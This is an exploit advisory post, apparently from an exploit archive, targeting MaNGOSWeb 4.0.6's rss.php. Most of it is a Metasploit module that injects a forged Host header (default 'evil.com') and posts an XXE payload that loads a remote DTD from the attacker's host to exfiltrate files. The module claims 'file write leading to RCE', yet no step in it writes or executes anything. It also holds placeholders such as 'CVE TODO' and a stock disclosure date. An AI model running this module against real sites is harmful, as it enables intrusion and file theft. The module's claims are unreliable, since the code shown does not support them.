MaNGOSWeb 4.0.6 Host Header Injection / XML Injection

=============================================================================================================================================
| # Title MaNGOSWeb 4.0.6 Host Header Injection / XML Injection

=============================================================================================================================================
| # Title : MaNGOSWeb V4 4.0.6 Host Header Injection + XXE |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://github.com/paintballrefjosh/MaNGOSWebV4/blob/master/rss.php |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/212429/ & CVE-2017-6478

[+] Summary : This module exploits multiple vulnerabilities in MangosWeb v4 RSS generator, including Host Header Injection, XXE, and file write leading to RCE

[+] POC :

##
# This module requires Metasploit: https://metasploit.com/download
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'MangosWeb v4 RSS Multiple Vulnerabilities',
'Description' => %q{
This module exploits multiple vulnerabilities in MangosWeb v4 RSS generator,
including Host Header Injection, XXE, and file write leading to RCE.
},
'Author' => [ 'indoushkq' ],
'License' => MSF_LICENSE,
'References' => [
[ 'CVE', 'TODO' ],
[ 'URL', 'http://mistvale.com' ]
],
'Privileged' => false,
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [ ['Automatic', {}] ],
'DefaultTarget' => 0,
'DisclosureDate' => '2024-01-01'
))

register_options([
OptString.new('TARGETURI', [true, 'The base path to MangosWeb', '/']),
OptString.new('HOSTHEADER', [false, 'Malicious host header', 'evil.com'])
])
end

def check
uri = normalize_uri(target_uri.path, 'rss.php')
res = send_request_cgi({'uri' => uri})

if res && res.code == 200 && res.body.include?('<rss')
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end

def exploit
# Step 1: Host Header Injection to poison RSS
print_status("Injecting malicious host header...")
uri = normalize_uri(target_uri.path, 'rss.php')

res = send_request_cgi({
'uri' => uri,
'headers' => {'Host' => datastore['HOSTHEADER']}
})

# Step 2: XXE to read files
print_status("Attempting XXE...")
xxe_payload = %Q|<?xml version="1.0"?>
<!DOCTYPE rss [
<!ENTITY % remote SYSTEM "http://#{datastore['LHOST']}:#{datastore['LPORT']}/evil.dtd">
%remote;
%param;
%exfil;
]>|

# Step 3: Execute payload
print_status("Sending payload...")
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'index.php'),
'vars_post' => {
'title' => 'Exploit',
'message' => xxe_payload,
'posted_by' => Rex::Text.rand_text_alpha(10)
}
})

handler
end
end

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================